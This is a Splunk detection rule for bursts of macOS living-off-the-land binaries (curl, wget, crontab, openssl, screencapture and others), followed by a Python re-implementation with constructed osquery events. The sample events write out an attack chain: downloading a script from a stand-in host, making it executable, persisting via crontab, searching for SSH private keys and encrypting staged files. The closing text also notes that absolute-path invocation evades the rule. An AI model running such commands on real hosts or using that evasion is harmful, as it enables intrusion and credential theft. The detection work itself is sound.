SPL | Apache-2.0 | from splunk/security_content

MacOS LOLbin

The following analytic detects a burst of Living-off-the-Land binary (LOLBin) executions on macOS by a single user on a single host. It leverages osquery's es_process_events table (EndpointSecurity process events) and matches command lines that begin with chmod, crontab, curl, find, funzip, killall, openssl, screencapture or wget; it then aggregates the matches by user and host and alerts when more than three distinct binary paths were executed within the search's time window. This activity is significant because LOLBins are pre-installed, Apple-signed system binaries that attackers use for download, staging, persistence and defense evasion without dropping new tooling. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or persist within the environment, posing a significant security risk.

Rule source: detections/endpoint/macos_lolbin.yml
`osquery_macro`
name=es_process_events
columns.cmdline IN (
    "chmod*",
    "crontab*",
    "curl*",
    "find*",
    "funzip*",
    "killall*",
    "openssl*",
    "screencapture*",
    "wget*"
)
| rename columns.* as *
| stats count min(_time) as firstTime
              max(_time) as lastTime
              values(cmdline) as cmdline
              values(pid) as pid
              values(parent) as parent
              values(path) as path
              values(signing_id) as signing_id
              dc(path) as dc_path
    BY username host

| rename username as user
        cmdline as process
        path as process_path
        host as dest

| where dc_path > 3
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `macos_lolbin_filter`
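The search above cannot be run outside Splunk, so the following is an added Python re-implementation of its filter, stats and where stages over a handful of constructed osquery result rows. It is example code written for this page, not code from the splunk/security_content rule; the event shape (a top-level name, host and _time plus the osquery columns dict), the host names, user names, PIDs and signing_id values are all assumptions made for the example.

```python
"""Re-implementation of the macos_lolbin SPL logic over constructed osquery rows.

Added example, not the rule's own code. Event shape, hosts, users, PIDs and
signing_id values below are constructed for illustration.
"""
from collections import defaultdict
from fnmatch import fnmatchcase

# The same trailing-wildcard prefixes the SPL lists in `columns.cmdline IN (...)`.
LOLBIN_PATTERNS = ("chmod*", "crontab*", "curl*", "find*", "funzip*",
                   "killall*", "openssl*", "screencapture*", "wget*")

# `where dc_path > 3`: a user/host pair must have run more than 3 distinct binaries.
DC_PATH_THRESHOLD = 3


def is_lolbin_cmdline(cmdline):
    """Mimic `columns.cmdline IN ("chmod*", ...)`.

    The search command compares field values case-insensitively, and the only
    wildcard is trailing, so this is a leading-anchored prefix test on cmdline.
    A cmdline such as "/usr/bin/curl ..." therefore does NOT match "curl*".
    """
    lowered = cmdline.lower()
    return any(fnmatchcase(lowered, pat) for pat in LOLBIN_PATTERNS)


def detect_macos_lolbin(events):
    """Filter es_process_events rows, group by (username, host), apply the threshold.

    Returns one alert dict per (user, dest) pair, with the same output field
    names the SPL produces after its `rename` stage.
    """
    groups = defaultdict(list)
    for ev in events:
        if ev.get("name") != "es_process_events":   # `name=es_process_events`
            continue
        cols = ev["columns"]                         # `rename columns.* as *`
        if not is_lolbin_cmdline(cols.get("cmdline", "")):
            continue
        groups[(cols["username"], ev["host"])].append(ev)   # `BY username host`

    alerts = []
    for (user, dest), evs in groups.items():
        paths = {e["columns"]["path"] for e in evs}          # dc(path)
        if len(paths) <= DC_PATH_THRESHOLD:
            continue
        alerts.append({
            "user": user,
            "dest": dest,
            "count": len(evs),
            "firstTime": min(e["_time"] for e in evs),
            "lastTime": max(e["_time"] for e in evs),
            "process": sorted({e["columns"]["cmdline"] for e in evs}),
            "pid": sorted({e["columns"]["pid"] for e in evs}),
            "parent": sorted({e["columns"]["parent"] for e in evs}),
            "process_path": sorted(paths),
            "signing_id": sorted({e["columns"]["signing_id"] for e in evs}),
            "dc_path": len(paths),
        })
    return alerts


def _ev(t, host, user, cmdline, path, pid, parent, name="es_process_events"):
    """Build one constructed osquery result row as Splunk would index it."""
    return {"name": name, "host": host, "_time": t,
            "columns": {"cmdline": cmdline, "path": path, "pid": pid,
                        "parent": parent, "username": user,
                        "signing_id": "com.apple." + path.rsplit("/", 1)[-1]}}


# Constructed sample data.
SAMPLE_EVENTS = [
    # alice on mac-01: download, mark executable, persist, hunt keys, encrypt -> 5 paths.
    _ev(1000, "mac-01", "alice", "curl -s http://x/p.sh -o /tmp/p.sh", "/usr/bin/curl", 501, 500),
    _ev(1005, "mac-01", "alice", "chmod +x /tmp/p.sh", "/bin/chmod", 502, 500),
    _ev(1010, "mac-01", "alice", "crontab /tmp/cron.txt", "/usr/bin/crontab", 503, 500),
    _ev(1020, "mac-01", "alice", "find / -name id_rsa", "/usr/bin/find", 504, 500),
    _ev(1030, "mac-01", "alice", "openssl enc -aes-256-cbc -in /tmp/o -out /tmp/o.enc", "/usr/bin/openssl", 505, 500),
    _ev(1040, "mac-01", "alice", "ls -la /tmp", "/bin/ls", 506, 500),          # not a listed LOLBin
    _ev(1050, "mac-01", "alice", "curl http://x/q", "/usr/bin/curl", 507, 500, name="processes"),  # wrong table
    # bob on mac-02: only 2 distinct binaries, under the threshold.
    _ev(2000, "mac-02", "bob", "curl https://example.com", "/usr/bin/curl", 601, 600),
    _ev(2010, "mac-02", "bob", "curl https://example.com/2", "/usr/bin/curl", 602, 600),
    _ev(2020, "mac-02", "bob", "find . -name '*.txt'", "/usr/bin/find", 603, 600),
    # carol on mac-03: 4 distinct LOLBins, all invoked by absolute path -> blind spot.
    _ev(3000, "mac-03", "carol", "/usr/bin/curl -O http://x/a", "/usr/bin/curl", 701, 700),
    _ev(3010, "mac-03", "carol", "/bin/chmod +x a", "/bin/chmod", 702, 700),
    _ev(3020, "mac-03", "carol", "/usr/bin/crontab a", "/usr/bin/crontab", 703, 700),
    _ev(3030, "mac-03", "carol", "/usr/bin/killall Terminal", "/usr/bin/killall", 704, 700),
]

if __name__ == "__main__":
    for alert in detect_macos_lolbin(SAMPLE_EVENTS):
        print(alert)
```

Running the block yields a single alert for alice on mac-01 (count 5, dc_path 5) and nothing for carol on mac-03, even though she ran four different listed binaries: the IN() patterns are prefix matches on cmdline, so invocations by absolute path slip through. Matching on the path column, which osquery fills from the executed binary regardless of how it was typed, would close that gap; the rule as published does not do so.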